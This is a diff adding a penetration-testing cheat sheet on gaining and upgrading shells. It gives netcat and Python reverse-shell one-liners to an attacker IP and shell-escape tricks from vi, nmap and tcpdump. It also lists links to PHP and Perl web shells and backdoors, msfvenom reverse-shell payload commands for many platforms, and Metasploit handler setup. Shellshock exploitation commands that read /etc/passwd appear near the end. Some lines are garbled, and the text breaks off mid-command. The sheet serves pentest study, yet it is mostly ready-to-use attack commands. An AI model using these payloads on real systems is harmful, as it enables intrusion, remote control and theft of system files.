diff --git a/Cheatsheet_Shells.txt b/Cheatsheet_Shells.txt new file mode 100644 index 0000000..2c8f549 --- /dev/null +++ b/Cheatsheet_Shells.txt @@ -0,0 +1,147 @@ +Netcat Shell Listener +`nc -nlvp 4444` + +Spawning a TTY Shell - Break out of Jail or limited shell +You should almost always upgrade your shell after taking control of an apache or www user. +(For example when you encounter an error message when trying to run an exploit sh: no job control in this shell ) +(hint: sudo -l to see what you can run) + +You may encounter limited shells that use rbash and only allow you to execute a single command per session. +You can overcome this by executing an SSH shell to your localhost: +ssh user@$ip nc $localip 4444 -e /bin/sh +enter user's password +python -c 'import pty; pty.spawn("/bin/sh")' +export TERM=linux +`python -c 'import pty; pty.spawn("/bin/sh")'` +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);' +`echo os.system('/bin/bash')` +`/bin/sh -i` +`perl 'exec "/bin/sh";'` +perl: `exec "/bin/sh";` +ruby: `exec "/bin/sh"` +lua: `os.execute('/bin/sh')` +From within IRB: `exec "/bin/sh"` + +From within vi: `:!bash` +or +`:set shell=/bin/bash:shell` + +From within vim `':!bash':` + +From within nmap: `!sh` + +From within tcpdump +echo id\\n/bin/netcat $ip 443 “e /bin/bash’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump ln I eth- -w /dev/null W 1 G 1 z /tmp/.tst Z root + +From busybox `/bin/busybox telnetd -|/bin/sh -p9999` + +Pen test monkey PHP reverse shell +http://pentestmonkey.net/tools/web-shells/php-reverse-shel + +php-findsock-shell - turns PHP port 80 into an interactive shell +http://pentestmonkey.net/tools/web-shells/php-findsock-shell + +Perl Reverse Shell +http://pentestmonkey.net/tools/web-shells/perl-reverse-shell + +PHP powered web browser Shell b374k with file upload etc. +https://github.com/b374k/b374k + +Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell +https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1 + +Web Backdoors from Fuzzdb +https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors + +Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/ + +*Linux* +`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf` + +*Windows* +`msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe` + +*Mac* +`msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho` + + +**Web Payloads** + +*PHP* +`msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php` +OR +`msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php` + +Then we need to add the shell.php && pbpaste >> shell.php` + +*ASP* +`msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp` + +*JSP* +`msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp` + +*WAR* +`msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war` + + +**Scripting Payloads** +*Python* +`msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py` + +*Bash* +`msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh` + +*Perl* +`msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl` + + +**Shellcode** +For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. + +*Linux Based Shellcode* +`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f ` + +*Windows Based Shellcode* +`msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f ` + +*Mac Based Shellcode* +`msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f ` + + +**Handlers** +Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. +use exploit/multi/handler +set PAYLOAD +set LHOST +set LPORT +set ExitOnSession false +exploit -j -z + +Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘ + +- SSH to Meterpreter: https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/ + +use auxiliary/scanner/ssh/ssh_login +use post/multi/manage/shell_to_meterpreter + + +Shellshock + +Testing for shell shock with NMap +`root@kali:~/Documents# nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi $ip` + +git clone https://github.com/nccgroup/shocker +`./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose` + +Shell Shock SSH Forced Command + +Check for forced command by enabling all debug output with ssh +ssh -vvv +ssh -i noob noob@$ip '() { :;}; /bin/bash' + +cat file (view file contents) +echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; echo \\$(